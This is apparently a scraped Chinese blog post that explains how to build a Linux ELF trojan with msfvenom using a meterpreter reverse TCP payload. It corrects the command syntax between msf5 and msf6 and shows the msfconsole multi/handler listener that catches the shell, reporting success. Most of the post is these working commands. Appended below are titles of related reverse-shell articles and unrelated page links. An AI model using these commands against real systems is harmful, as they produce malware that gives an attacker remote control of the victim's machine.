最开始用的生成木马的命令

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

生成木马只有250b,显然是不成功的

问题根源:
msf版本不同导致语法不同

msf5版本的命令

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

msf6版本的命令

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

我的版本是msf6,按上述对应版本命令执行,生成木马成功

生成监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
run

反弹成功

msf生成linux elf木马反弹shell相关推荐

  1. 「渗透」:一句话木马反弹shell的思路

    前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等:问题在于,不管用python.bash还是perl都反弹不了,偷不了懒,就上msf把. http://target- ...

  2. linux各种一句话反弹shell总结

    [技术分享]linux各种一句话反弹shell总结 作者:[myles007] 简介 我们在渗透测试的过程中经常会遇到linux主机环境,而在获取linux主机shell是我们经常需要做的是工作内容之 ...

  3. 解释linux中的三种重定向,Linux重定向及反弹shell详解

    这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x ...

  4. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹. 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常 ...

  5. Linux中一句话反弹Shell细说

    简介 我们在渗透测试的过程中经常会遇到linux主机环境,而在获取linux主机shell是我们经常需要做的是工作内容之一,其中经常会遇到以下几个场景. 一.场景一 我们已经拿下主机的一个webshe ...

  6. msf生成linux shellcode,MSF-Shellcode生成和使用

    1使用環境 Kali 2.0 msfvenom 2Msfvenom參數說明 msfvenom �Ch    查看幫助 說明: Options: -p, --payload            指定需 ...

  7. msf生成linux shellcode,使用MSF打造各种ShellCode

    生成各种后门 Windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP L ...

  8. linux 反弹shell(二)反弹shell的本质

    0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...

  9. 一句话反弹shell

    1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n:  不反向解析dns,即不通过ip解析域名 no dns -v:  详细信息输出 verbose -l:   监听 ...

最新文章

  1. node 16位 转24位_C代码实现16位和32位数据字节序转换
  2. 保研生看过来!加入DUT Media Lab,科研没有不可能!
  3. 手动选择显示_为什么考驾照的人多数选择C1而不是C2?老教练说出了真相....
  4. java获取响应网页源代码
  5. std::string.assign()的用法-爱情滕-搜狐博客
  6. Apache 的知识点
  7. java学习(java入门)
  8. VC2010编译源代码编辑控件scintilla
  9. 使用html仿支付宝首页,仿支付宝首页头部伸缩效果
  10. JSON简介与解析方法(超级详细)
  11. 推荐算法之DeepFM
  12. 计算机右键菜单太多,鼠标右键菜单选项太多:清理多余菜单选项的方法
  13. html如何插入一张图片,html如何插入图片
  14. Lick the habit 戒除恶习
  15. 推荐电影 奥黛丽赫本的十大经典电影 1953-1989
  16. 2020清华计算机科学与技术录取分析总结
  17. Hexo+NexT 如何取消下划线
  18. Nginx 同时运行多个服务
  19. ASPICE SWE3之——C代码生成软件详细设计2 注释格式
  20. springboot项目:老年教育学习系统fte91(java+VUE+Mybatis+Maven+Mysql)

热门文章

  1. CentOS 7安装最新版本NMAP
  2. 如何自建一个慕课(微课)演播室
  3. 2014-2020年GDP栅格
  4. 使用HashMap统计字符出现的次数
  5. nginx(三十六)健康检查
  6. STC-ISP程序下载
  7. windows 2003 自带tftp32设置方法
  8. 关于lib/asm-offsets.c:1:0: error: bad value (armv5) for -march= switch问题解决办法
  9. 三星9300 Kies 升级包 存储
  10. [原创] 火焰文字的教程